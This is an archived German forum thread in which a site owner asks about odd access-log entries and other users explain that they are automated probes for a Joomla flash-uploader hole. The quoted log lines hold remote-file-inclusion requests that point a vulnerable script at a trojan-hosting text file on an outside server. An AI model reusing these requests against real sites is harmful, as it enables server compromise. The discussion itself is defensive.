Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Logfile-Angabe unklar. Was ist das?

Das Board für die kleine Abwechslung. Hast Du was lustiges im Web gefunden oder was offtopic dann hier rein!
Neues Thema Antworten

 Autovervollständigung übernehmen?

Knigge

 
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 02.06.2008, 17:09

Hi,

da ich dies zum ersten Mal in meinen Logiles sehe, weiß ich nicht viel damit anzufangen. Kann mich da jemand netterweise schlauer machen?
Handelt es sich um eine Suchmaschine? Oder was bedeutet das?

77.xxx.xxx.xx - - [01/Jun/2008:20:44:43 +0200] "GET /links.html%3C/administrator/components/com_joomla_flash_uploader/
install.joomla_flash_uploader.php?mosConfig_absolute_path=
https://www. fingerxs.eu/modules/sxxxxxx.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
77.xxx.xxx.xx - - [01/Jun/2008:20:44:45 +0200] "GET /administrator/components/com_joomla_flash_uploader/
install.joomla_flash_uploader.php?mosConfig_absolute_path=
https://www. fingerxs.eu/modules/sxxxxx.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"

VG
Zuletzt geändert von Alayna am 03.06.2008, 05:51, insgesamt 1-mal geändert.
Nach oben
Anzeige von ABAKUS

von Anzeige von ABAKUS »


Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0
Nach oben
MBDealer
PostRank 2
PostRank 2
Beiträge: 60
Registriert: 13.06.2007, 18:36

Beitrag von MBDealer » 02.06.2008, 17:23

Hallo Alayna,

da hat wohl einer versucht deine Webseite zu hacken indem er versucht hat eine bestimmte Sicherheitslücke auszunutzen.

Und Vorsicht bei solchen Einträgen die sistem.txt Datei die in deinem Logfiles aufgetaucht ist ist verseucht mit einem Trojaner.
Nach oben
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 03.06.2008, 05:51

Hallo MBDealer,

danke für deine Antwort. So sieht also ein Hackversuch aus.
Hm ...
Nach oben
Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Nach oben
grossy
PostRank 6
PostRank 6
Beiträge: 477
Registriert: 21.07.2007, 17:55

Beitrag von grossy » 03.06.2008, 07:48

Naja, so ein richtiger Hackversuch ist das noch nicht. Da wird erstmal geschaut, ob Du Software installiert hast, die Lücken/Angriffsmöglichkeiten enthalten. Aber da das ja hoffentlich nicht so ist....
Nach oben
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 03.06.2008, 08:22

Hallo grossy,

ja, an dem Punkt bin ich gerade - also versuche durchzublicken, was da passiert ist. Weil der Hackodernurguckversuch nicht nur vorgestern sondern auch gestern in den Logfiles drin war. Bin mal gespannt, wann die Leute das merken, dass ich keine Software installiert habe.

Ich benutze kein CMS, kein Joomla, nix. Ich bin ein Dinosaurier :lol:, ich erstelle meine Seiten manuell. Bin aber ratlos, was ich tun kann, damit der Mensch nicht noch Erfolg hat. Habe meinen Hoster angemailt und gefragt, was ich tun kann und die meinten:
"... wenn Sie Ihre Seite selber mit XHTML und CSS erstellen, werden Hackangriffe keinen Erfolg haben. Die meisten Seite die gehackt werden, basieren auf PHP."
Na ich hoffe, das ist wirklich so. :-)
Nach oben
Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 03.06.2008, 08:37

also versuche durchzublicken, was da passiert ist. Weil der Hackodernurguckversuch nicht nur vorgestern sondern auch gestern in den Logfiles drin war.
Wenn du eine Domain hast, die bekannt(er) ist, ist dies normal. Die Tests laufen i.d.R. automatisiert ab. Gelingt der Einbruch, erfolgt die Rückmeldung über die gelungene Intallation einer Backdoor meist über einen IRC-Channel.
Nach oben
grossy
PostRank 6
PostRank 6
Beiträge: 477
Registriert: 21.07.2007, 17:55

Beitrag von grossy » 03.06.2008, 08:50

@Alayna

Mach Dir nicht son einen Kopf, das was in Deinen Logfiles steht, gehört zu dem normalen Hintergrundrauschen im Internet. Bei meinen steht da noch einiges mehr drin....
Nach oben
Ice Man
PostRank 9
PostRank 9
Beiträge: 2477
Registriert: 04.06.2003, 19:16

Beitrag von Ice Man » 03.06.2008, 10:05

Den "libwww-perl/5.808" würde ich eh sperren, der sucht immer nach sicherheitslücken, vorallem bei phpbb Foren ist der sehr aktiv.

Hab täglich über 100 gesperrte Einträge im Logfile...
Nach oben
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 03.06.2008, 10:59

@Pompom
Meine Webseite ist absolut unwichtig und unbekannt (für Hacker). Weshalb mich das Ganze stutzig macht, zumal derjenige bisher 2 x meine Webseite "abgecheckt" hat. Eigentlich müsste derjenige doch gemerkt haben, dass ich kein CMS benutze.

@grossy
Neee, einen Kopf mache ich mir nicht, aber ich weiß gern über solche Dinge Bescheid, damit ich für die nächsten Male nicht wieder nachfragen muss, was das ist.

@Ice Man
Hm, laut Support-Team bin ich auf der sicheren Seite mit meinen nur .html und .css Dateien. Aber es ist interessant zu wissen, dass "libwww-perl/5.808" nach Sicherheitslücken sucht, das wusste ich auch noch nicht.

Danke Euch allen für Eure Kommentare, ich habe wieder was dazu gelernt. :)

Edit:
war nix
Nach oben
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 03.06.2008, 17:09

:-? Mir fällt ein, ich war heute früh für 1 Sekunde auf der Seite https://www. fingerxs.eu/modules/bösedatei.txt? - weil ich gucken wollte, was das für eine Seite ist. Habe ich mir dadurch womöglich schon den Trojaner eingefangen?

Eine Warnung oder sowas habe ich von meiner Firewall/Schutzprogramm nicht erhalten. O Mann ... bin ich blöd ... :roll:
Nach oben
Southmedia
PostRank 10
PostRank 10
Beiträge: 7322
Registriert: 20.07.2003, 19:56

Beitrag von Southmedia » 03.06.2008, 18:00

Nein, normalerweise ist das kein Problem. Die Datei entfalten ihre komplette Wirkung erst, wenn sie irgendwo eingebunden werden konnten. Mach dir also nicht zu viele Sorgen.
Nach oben
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 03.06.2008, 18:08

Danke, du hast meinen Abend gerettet @Southmedia.
Nach oben
Malte Landwehr
PostRank 10
PostRank 10
Beiträge: 3474
Registriert: 22.05.2005, 10:45

Beitrag von Malte Landwehr » 03.06.2008, 18:23

Alayna hat geschrieben:Meine Webseite ist absolut unwichtig und unbekannt (für Hacker).
Die Skripte laufen meist nicht gesteuert sondern graben Linklisten (z.B. vom DMOZ oder Wikipedia) ab oder holen sich URLs per Google-Suche.

Alayna hat geschrieben:Weshalb mich das Ganze stutzig macht, zumal derjenige bisher 2 x meine Webseite "abgecheckt" hat. Eigentlich müsste derjenige doch gemerkt haben, dass ich kein CMS benutze.
Skritpkiddys sind nicht unbedingt die besten Programmierer und da kann das schon mal vorkommen. Arg wirds nur wenn eine Eindloschschleife mit einem Aufruf deiner Domain entsteht und die den Bot nicht blockst.
Die 45 wichtigsten SEO-Tools und wie ich sie nutze.
Nach oben
Alayna
PostRank 1
PostRank 1
Beiträge: 22
Registriert: 14.08.2007, 11:37

Beitrag von Alayna » 03.06.2008, 18:59

@nXplorer

Danke für die Info.
Leider habe ich keinen Zugriff auf die .htaccess, weil ich nur das Startpaket bei meinem Hoster habe. Ich will mal hoffen, dass ab nun Ruhe herrscht.
Nach oben
GreenHorn
PostRank 10
PostRank 10
Beiträge: 4487
Registriert: 19.12.2005, 15:01

Beitrag von GreenHorn » 03.06.2008, 19:09

Ice Man hat geschrieben: Hab täglich über 100 gesperrte Einträge im Logfile...
Hatte letzten Monat 30.121 und dazu noch mal ein wenig Grobzeug (404, 500 und 400) womit der Server nix anfangen konnte. Ne Menge Freaks da draußen...
Nach oben
Antworten

Zurück zu „Offtopic, Spaßecke und alle sonstigen Themen“

  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag